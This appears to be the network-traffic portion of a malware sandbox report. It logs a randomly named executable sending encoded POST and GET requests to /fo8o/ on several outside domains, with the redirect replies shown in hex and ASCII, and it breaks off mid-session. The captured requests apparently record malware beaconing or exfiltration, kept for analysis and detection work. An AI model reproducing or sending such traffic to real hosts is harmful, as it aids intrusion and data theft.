                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.1149719116.50.37.244806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:26.081218958 CEST1830OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.goldenjade-travel.com
                                                    Origin: http://www.goldenjade-travel.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 48 47 38 7a 4d 2f 75 4c 57 32 35 65 38 33 59 76 75 7a 46 41 38 70 6f 79 36 61 70 35 31 67 37 47 6b 34 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 64 49 78 6b 64 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a [TRUNCATED]
                                                    Data Ascii: Zl4h1=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnHG8zM/uLW25e83YvuzFA8poy6ap51g7Gk4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZdIxkdfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpMYBMWcky02DneIJBpTzAmuJOAz5QXmbpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUhYLUIy6fLP8iYfrnTUW0LSocQQjipnC0WvC+qSq9UVMiDhBD752zisyPxjgCYVpU4vit/jihlIuAKAdDu7mWpC+gbIbINmRdtk41h4oclAMbxlNnnaHftmGNuCNwDdKC5sB1gl2vU4K6s91Z8fv4utAGt4pOjM7F0Viocf+bG41Kahiohy1mG7c6AYoxeUFLYtJBxw1PdR9c9j/q3g03YHK6YpS8sj4vBMQupa+fUtHvDt8EQkQragXZpgRHFfxG2yPCP6Oz4xU72X3yyxSk4TaxsupqvMvtMk56SZLA4KS5viPeI3ukdW72sREt1ukWYVAqi3JoMHg/qqzQv6n7+TA8VFCRAgXPFmCkH4c/NhxQBsQCETt4Qh/BDGYgY5Ab1lkuAD+KPGr1SaeEgmgi6CcZMLIBwoGzIWkViCqshdND+Ct6YcjY2kPO9mihC5sUoMK2IP/f8J4vz0E35RhbK4Wxqb0Z+q+uGXHNJTkN9UrNxITrcSTq4cOhpA5QpFR/tuTPZIylTxVD [TRUNCATED]
                                                    Jun 9, 2024 18:00:27.208110094 CEST599INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:26 GMT
                                                    Connection: close
                                                    Content-Length: 156
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.1149720116.50.37.244806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:28.611443996 CEST513OUTGET /fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.goldenjade-travel.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:00:29.777225018 CEST885INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:29 GMT
                                                    Connection: close
                                                    Content-Length: 301
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 5a 6c 34 68 31 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 67 53 45 49 6b 54 41 72 7a 4e 55 58 58 36 69 38 4d 75 41 65 58 46 30 4b 45 4e 54 7a 57 47 44 6f 6b 2f 34 3d 26 61 6d 70 3b 50 62 77 3d 50 4c 56 58 62 6e 47 38 35 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&amp;Pbw=PLVXbnG85">here</a>.</h2></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.114972146.30.213.191806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:35.109940052 CEST794OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.antonio-vivaldi.mobi
                                                    Origin: http://www.antonio-vivaldi.mobi
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6d 67 4a 75 6b 53 53 73 63 4c 45 77 44 4b 4c 50 4b 37 4a 54 4d 57 2f 79 61 57 2b 50 6d 76 66 38 73 41 3d 3d
                                                    Data Ascii: Zl4h1=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OmgJukSSscLEwDKLPK7JTMW/yaW+Pmvf8sA==
                                                    Jun 9, 2024 18:00:35.940392017 CEST561INHTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 163
                                                    Expires: Sun, 09 Jun 2024 16:10:35 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:35 GMT
                                                    Location: https://musee.mobi/vivaldi/fo8o/
                                                    Date: Sun, 09 Jun 2024 16:00:35 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 13834904433
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.114972246.30.213.191806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:37.642338037 CEST814OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.antonio-vivaldi.mobi
                                                    Origin: http://www.antonio-vivaldi.mobi
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 33 77 4f 77 66 2f 76 65 36 31 33 50 62 54 63 64 6b 78 4f 33 4e 30 2f 64 76 69 48 4e 55 44 39 59 63 3d
                                                    Data Ascii: Zl4h1=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPF3wOwf/ve613PbTcdkxO3N0/dviHNUD9Yc=
                                                    Jun 9, 2024 18:00:38.475478888 CEST561INHTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 163
                                                    Expires: Sun, 09 Jun 2024 16:10:38 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:38 GMT
                                                    Location: https://musee.mobi/vivaldi/fo8o/
                                                    Date: Sun, 09 Jun 2024 16:00:38 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 14148443470
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.114972346.30.213.191806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:40.173988104 CEST1827OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.antonio-vivaldi.mobi
                                                    Origin: http://www.antonio-vivaldi.mobi
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 77 4f 43 71 33 36 4a 72 41 44 65 47 6d 59 64 7a 54 50 6c 75 47 72 75 75 4c 31 4b 4e 45 38 53 77 39 2b 30 39 57 72 54 38 4a 47 69 38 38 63 47 33 55 38 73 54 4d 77 61 33 38 63 74 35 64 64 35 64 49 35 56 39 4d 39 66 4d 35 61 31 37 58 63 55 4b 44 7a 55 6c 2f 78 33 36 52 32 49 4e 4f 62 4f 45 70 62 4e 39 2f 4f 67 4c 67 32 4c 42 78 68 75 77 30 43 77 4b 6b 4a 68 38 37 50 4d 62 43 54 58 38 72 54 63 77 74 4b 76 58 53 61 6b 77 69 73 61 6e 55 72 2f 47 6d 49 74 33 52 4b 39 36 62 50 2b 69 66 78 [TRUNCATED]
                                                    Data Ascii: Zl4h1=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJwOCq36JrADeGmYdzTPluGruuL1KNE8Sw9+09WrT8JGi88cG3U8sTMwa38ct5dd5dI5V9M9fM5a17XcUKDzUl/x36R2INObOEpbN9/OgLg2LBxhuw0CwKkJh87PMbCTX8rTcwtKvXSakwisanUr/GmIt3RK96bP+ifxQWkrPZduiYh/QDByfmTs3OolUKqZbiP8yyqVs1pJg64J5EYbpThc6Ak1/jUoVr5bOq3a/POoshmotLHjZgE12xzP/q8UGugTMBLRNFz6VJ3P6p+7eWqqWjcx/eJv/b5clHrjV8rz0NVXHFjj3vZOjPbnJdyEdCwd2wCmcNBv+wm5b+b0o29zaJEhUBW+sDLisSJ7vH/K4smYC9oVOF440ytcStYC298M9dfF1a8tnh+kdlXkgBWzC4jqP0brDnM9WTv8Ac2mzZcmKO4xqcFff9E2Z9AR5cIL5CZq5DJGIsqnM0BmxefMcEV5d507eoVXgO5Bl/JV0ye9eiF/uZ+qrJ8P2GTV9wlwXRwtyxNhVrEq8uO4cm3XCo3Gnvrmzr0vS+iDEa5ZA0xsSfM7DrRA4w+cZn/mnOkSAkzIf/hJSxrkYADi6QoWLDqGSesULB6fdtdhNSb0SBJFPdzFGaT2hHO09M72y9H3ak6i5tv3PCGyGx1NyoICDwDPTOqVGTAfrd70sbL+Gs7Ivwp90V4mxb+q2hGO3pNJsyTGljcKWhABNjVQt+5aol4KchOmlcqplS6qhyMLY3g2Faqgp5EKh296ngC2xcEDwjwdqH0WW8oZzNxBKxzShoCnxpWQUcEDidHTMbPigpReTDU2UXfjyko3PgOqhK8AqV [TRUNCATED]
                                                    Jun 9, 2024 18:00:41.002940893 CEST561INHTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 163
                                                    Expires: Sun, 09 Jun 2024 16:10:40 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:40 GMT
                                                    Location: https://musee.mobi/vivaldi/fo8o/
                                                    Date: Sun, 09 Jun 2024 16:00:40 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 14220691878
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.114972446.30.213.191806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:42.712661982 CEST512OUTGET /fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.antonio-vivaldi.mobi
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:00:43.538681984 CEST851INHTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 312
                                                    Expires: Sun, 09 Jun 2024 16:10:43 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:43 GMT
                                                    Date: Sun, 09 Jun 2024 16:00:43 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    location: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 14264139890
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 5a 6c 34 68 31 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 4c 47 52 36 30 6f 30 69 4b 46 32 42 2f 71 72 38 73 31 75 53 65 53 39 43 38 77 57 46 35 56 44 69 70 4d 73 3d 26 61 6d 70 3b 50 62 77 3d 50 4c 56 58 62 6e 47 38 35 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&amp;Pbw=PLVXbnG85" >here</a></p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.114972585.159.66.93806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:00:48.973733902 CEST776OUTPOST /fo8o/ HTTP/1.1
